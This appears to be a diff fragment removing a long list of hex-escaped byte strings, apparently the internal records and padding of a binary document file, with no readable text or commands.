-"\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe1\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x07" -"\x00\x00\x03\x24\x03\x61\x24\x03\x67\x64\x2e\x20\xb9\x00\x00\x1a" -"\xe7\x5b\x00\x00\x27\x5c\x00\x00\x28\x5c\x00\x00\x31\x5c\x00\x00" -"\x6f\x5c\x00\x00\xa1\x5c\x00\x00\xa2\x5c\x00\x00\xaf\x5c\x00\x00" -"\xf7\x5c\x00\x00\xf8\x5c\x00\x00\x04\x5d\x00\x00\x40\x5d\x00\x00" -"\x41\x5d\x00\x00\x48\x5d\x00\x00\x84\x5d\x00\x00\x85\x5d\x00\x00" -"\x92\x5d\x00\x00\xa7\x5d\x00\x00\xa8\x5d\x00\x00\xb9\x5d\x00\x00" -"\x22\x5e\x00\x00\x23\x5e\x00\x00\x3e\x5e\x00\x00\x66\x5e\x00\x00" -"\x97\x5e\x00\x00\xc0\x5e\x00\x00\xd8\x5e\x00\x00\xeb\x5e\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1b" -"\xb4\x5b\x00\x00\x28\x5c\x00\x00\x30\x5c\x00\x00\x31\x5c\x00\x00" -"\xa2\x5c\x00\x00\xae\x5c\x00\x00\xaf\x5c\x00\x00\xf8\x5c\x00\x00" -"\x03\x5d\x00\x00\x04\x5d\x00\x00\x41\x5d\x00\x00\x47\x5d\x00\x00" -"\x48\x5d\x00\x00\x85\x5d\x00\x00\x91\x5d\x00\x00\x92\x5d\x00\x00" -"\xa8\x5d\x00\x00\xb8\x5d\x00\x00\xb9\x5d\x00\x00\x23\x5e\x00\x00" -"\x3d\x5e\x00\x00\x3e\x5e\x00\x00\x25\x5f\x00\x00\x3f\x5f\x00\x00" -"\x40\x5f\x00\x00\xb9\x60\x00\x00\xcf\x60\x00\x00\xd0\x60\x00\x00" -"\x5b\x61\x00\x00\x84\x61\x00\x00\x85\x61\x00\x00\x21\x62\x00\x00" -"\x22\x62\x00\x00\x2a\x62\x00\x00\x4e\x63\x00\x00\x4f\x63\x00\x00" -"\x5b\x63\x00\x00\x46\x64\x00\x00\x4c\x64\x00\x00\x4d\x64\x00\x00" -"\x90\x64\x00\x00\xa7\x64\x00\x00\xa9\x64\x00\x00\x6e\x65\x00\x00" 
-"\x9b\x65\x00\x00\x9c\x65\x00\x00\x19\x66\x00\x00\x38\x66\x00\x00" -"\x39\x66\x00\x00\x7a\x66\x00\x00\x84\x66\x00\x00\x86\x66\x00\x00" -"\xf0\x66\x00\x00\xf1\x66\x00\x00\xfb\x66\x00\x00\xfc\x66\x00\x00" -"\xa1\x67\x00\x00\xa2\x67\x00\x00\xaf\x67\x00\x00\xb0\x67\x00\x00" -"\x7f\x68\x00\x00\x8a\x68\x00\x00\x8b\x68\x00\x00\xd2\x68\x00\x00" -"\xd3\x68\x00\x00\xec\x68\x00\x00\xed\x68\x00\x00\x35\x6a\x00\x00" -"\x36\x6a\x00\x00\x3f\x6a\x00\x00\x41\x6a\x00\x00\xc9\x6a\x00\x00" -"\xd3\x6a\x00\x00\xd4\x6a\x00\x00\x08\x6b\x00\x00\x13\x6b\x00\x00" -"\x14\x6b\x00\x00\x45\x6b\x00\x00\x5c\x6b\x00\x00\x5d\x6b\x00\x00" -"\xe3\x6b\x00\x00\xec\x6b\x00\x00\xed\x6b\x00\x00\x2c\x6d\x00\x00" -"\x3e\x6d\x00\x00\x3f\x6d\x00\x00\x9f\x6d\x00\x00\xab\x6d\x00\x00" -"\xac\x6d\x00\x00\xcf\x6d\x00\x00\xe1\x6d\x00\x00\xfc\xf5\xf0\xfc" -"\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5" -"\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf0\xf5\xfc\xf0\xf5" -"\xfc\xf5\xea\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc" -"\xe3\xf5\xf0\xfc\xe3\xf5\xf0\xfc\xf5\xf0\xfc\xe3\xf5\xf0\xfc\xe3" -"\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5\xf0\xfc\xf5" -"\xf0\xfc\xf5\xf0\xfc\xf5\x0c\x16\x68\x45\x6d\x47\x00\x35\x08\x81" -"\x3e\x2a\x01\x00\x0a\x16\x68\x45\x6d\x47\x00\x43\x4a\x18\x00\x00" -"\x09\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x0d\x16\x68\x45\x6d\x47" -"\x00\x35\x08\x81\x43\x4a\x18\x00\x06\x16\x68\x45\x6d\x47\x00\x5a" -"\xeb\x5e\x00\x00\xfc\x5e\x00\x00\x24\x5f\x00\x00\x25\x5f\x00\x00" -"\x40\x5f\x00\x00\x68\x5f\x00\x00\x98\x5f\x00\x00\xc1\x5f\x00\x00" -"\xde\x5f\x00\x00\xf1\x5f\x00\x00\x19\x60\x00\x00\x1a\x60\x00\x00" -"\xb8\x60\x00\x00\xb9\x60\x00\x00\xd0\x60\x00\x00\xf4\x60\x00\x00" -"\x5a\x61\x00\x00\x5b\x61\x00\x00\x85\x61\x00\x00\xad\x61\x00\x00" -"\x21\x62\x00\x00\x22\x62\x00\x00\x2a\x62\x00\x00\xed\x62\x00\x00" -"\x4e\x63\x00\x00\x4f\x63\x00\x00\x5a\x63\x00\x00\x45\x64\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1b" -"\x45\x64\x00\x00\x46\x64\x00\x00\x4d\x64\x00\x00\x8f\x64\x00\x00" -"\x90\x64\x00\x00\xa9\x64\x00\x00\x6d\x65\x00\x00\x6e\x65\x00\x00" -"\x9c\x65\x00\x00\x18\x66\x00\x00\x19\x66\x00\x00\x39\x66\x00\x00" -"\x79\x66\x00\x00\x7a\x66\x00\x00\x86\x66\x00\x00\xf0\x66\x00\x00" -"\xf1\x66\x00\x00\xfc\x66\x00\x00\xa1\x67\x00\x00\xa2\x67\x00\x00" 
-"\xb0\x67\x00\x00\x7f\x68\x00\x00\x80\x68\x00\x00\x8b\x68\x00\x00" -"\xd2\x68\x00\x00\xd3\x68\x00\x00\xed\x68\x00\x00\xfa\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x08\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x61" -"\x24\x03\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1a" -"\xed\x68\x00\x00\x07\x69\x00\x00\xfd\x69\x00\x00\x35\x6a\x00\x00" -"\x36\x6a\x00\x00\x41\x6a\x00\x00\xc9\x6a\x00\x00\xca\x6a\x00\x00" 
-"\xd4\x6a\x00\x00\x07\x6b\x00\x00\x08\x6b\x00\x00\x14\x6b\x00\x00" -"\x44\x6b\x00\x00\x45\x6b\x00\x00\x5d\x6b\x00\x00\x8f\x6b\x00\x00" -"\xe2\x6b\x00\x00\xe3\x6b\x00\x00\xed\x6b\x00\x00\x2b\x6d\x00\x00" -"\x2c\x6d\x00\x00\x3f\x6d\x00\x00\x9e\x6d\x00\x00\x9f\x6d\x00\x00" -"\xac\x6d\x00\x00\xce\x6d\x00\x00\xcf\x6d\x00\x00\xe2\x6d\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" 
-"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1b" -"\xe1\x6d\x00\x00\xe2\x6d\x00\x00\x1f\x6e\x00\x00\x2c\x6e\x00\x00" -"\x2d\x6e\x00\x00\x3b\x6f\x00\x00\x50\x6f\x00\x00\x86\x6f\x00\x00" -"\xa7\x6f\x00\x00\xb2\x6f\x00\x00\xb4\x6f\x00\x00\x1a\x70\x00\x00" -"\x1b\x70\x00\x00\x24\x70\x00\x00\x25\x70\x00\x00\x33\x70\x00\x00" -"\x44\x70\x00\x00\x47\x70\x00\x00\x55\x70\x00\x00\x5e\x70\x00\x00" -"\x5f\x70\x00\x00\x6d\x70\x00\x00\xd8\x71\x00\x00\xe3\x71\x00\x00" -"\xe4\x71\x00\x00\xf2\x71\x00\x00\x13\x72\x00\x00\x21\x72\x00\x00" -"\x44\x72\x00\x00\x4d\x72\x00\x00\x4e\x72\x00\x00\x5c\x72\x00\x00" -"\x80\x72\x00\x00\x8e\x72\x00\x00\xf4\x72\x00\x00\x02\x73\x00\x00" -"\x8b\x73\x00\x00\x8f\x73\x00\x00\x90\x73\x00\x00\x9e\x73\x00\x00" -"\xe9\x73\x00\x00\xed\x73\x00\x00\xee\x73\x00\x00\xf7\x73\x00\x00" -"\xf8\x73\x00\x00\x06\x74\x00\x00\x07\x74\x00\x00\x10\x74\x00\x00" -"\x20\x74\x00\x00\x30\x74\x00\x00\x31\x74\x00\x00\x3f\x74\x00\x00" -"\x40\x74\x00\x00\x46\x74\x00\x00\x4c\x74\x00\x00\x7f\x74\x00\x00" -"\xbc\x74\x00\x00\xbe\x74\x00\x00\x29\x75\x00\x00\x32\x75\x00\x00" -"\x33\x75\x00\x00\x41\x75\x00\x00\x42\x75\x00\x00\x53\x75\x00\x00" -"\x9d\x75\x00\x00\xab\x75\x00\x00\xaf\x75\x00\x00\xb0\x75\x00\x00" -"\xb3\x75\x00\x00\xb4\x75\x00\x00\xc0\x75\x00\x00\xe8\x75\x00\x00" -"\xed\x75\x00\x00\xee\x75\x00\x00\xf5\x75\x00\x00\xff\x75\x00\x00" -"\x07\x76\x00\x00\x0a\x76\x00\x00\xfa\xf6\xef\xfa\xf6\xe6\xfa\xef" -"\xf6\xe2\xf6\xe2\xde\xf6\xde\xf6\xda\xf6\xe2\xf6\xe2\xf6\xe2\xf6" -"\xe2\xf6\xe2\xf6\xe2\xf6\xe2\xf6\xe2\xf6\xe2\xf6\xe2\xf6\xe2\xf6" -"\xd6\xf6\xd6\xf6\xcf\xc8\xd6\xf6\xe2\xf6\xe2\xf6\xe2\xf6\xc4\xf6" -"\xe2\xf6\xe2\xf6\xe2\xf6\xd6\xf6\xde\xf6\xde\xf6\xde\xf6\xd6\xde" -"\xd6\xc4\xd6\xf6\xc8\x00\x00\x00\x06\x16\x68\x1e\x3b\x1d\x00\x00" -"\x0c\x15\x68\x3e\x75\xec\x00\x16\x68\x45\x6d\x47\x00\x00\x0c\x15" -"\x68\x3e\x75\xec\x00\x16\x68\x3e\x75\xec\x00\x00\x06\x16\x68\x3e" -"\x75\xec\x00\x00\x06\x16\x68\xae\x0f\x6a\x00\x00\x06\x16\x68\x55" 
-"\x3b\x1b\x00\x00\x06\x16\x68\x52\x59\xd7\x00\x00\x10\x16\x68\x45" -"\x6d\x47\x00\x35\x08\x81\x3e\x2a\x01\x43\x4a\x1c\x00\x00\x0d\x16" -"\x68\x45\x6d\x47\x00\x35\x08\x81\x43\x4a\x18\x00\x06\x16\x68\x45" -"\x6d\x47\x00\x00\x09\x16\x68\x45\x6d\x47\x00\x35\x08\x81\x00\x4d" -"\xe2\x6d\x00\x00\x1e\x6e\x00\x00\x1f\x6e\x00\x00\x2d\x6e\x00\x00" -"\x15\x6f\x00\x00\x16\x6f\x00\x00\x17\x6f\x00\x00\x18\x6f\x00\x00" -"\x19\x6f\x00\x00\x1a\x6f\x00\x00\x1b\x6f\x00\x00\x1c\x6f\x00\x00" -"\x1d\x6f\x00\x00\x1e\x6f\x00\x00\x1f\x6f\x00\x00\x20\x6f\x00\x00" -"\x21\x6f\x00\x00\x22\x6f\x00\x00\x23\x6f\x00\x00\x24\x6f\x00\x00" -"\x25\x6f\x00\x00\x26\x6f\x00\x00\x27\x6f\x00\x00\x28\x6f\x00\x00" -"\x29\x6f\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdd\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00" -"\x03\x24\x03\x0d\xc6\x0b\x00\x03\x65\x04\x7d\x0a\x43\x17\x00\x00" -"\x02\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x0b\x00\x00\x03\x24" -"\x03\x0d\xc6\x0b\x00\x03\x65\x04\x7d\x0a\x95\x10\x00\x00\x00\x61" -"\x24\x03\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\xbb\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x18" -"\x29\x6f\x00\x00\x2a\x6f\x00\x00\x2b\x6f\x00\x00\x2c\x6f\x00\x00" -"\x2d\x6f\x00\x00\x2e\x6f\x00\x00\x2f\x6f\x00\x00\x30\x6f\x00\x00" -"\x31\x6f\x00\x00\x32\x6f\x00\x00\x33\x6f\x00\x00\x34\x6f\x00\x00" -"\x35\x6f\x00\x00\x36\x6f\x00\x00\x37\x6f\x00\x00\x38\x6f\x00\x00" -"\x39\x6f\x00\x00\x3a\x6f\x00\x00\x3b\x6f\x00\x86\x51\x6f\x00\x00" -"\xa6\x6f\x00\x00\xa7\x6f\x00\x00\xaa\x6f\x00\x00\xf0\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xd4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
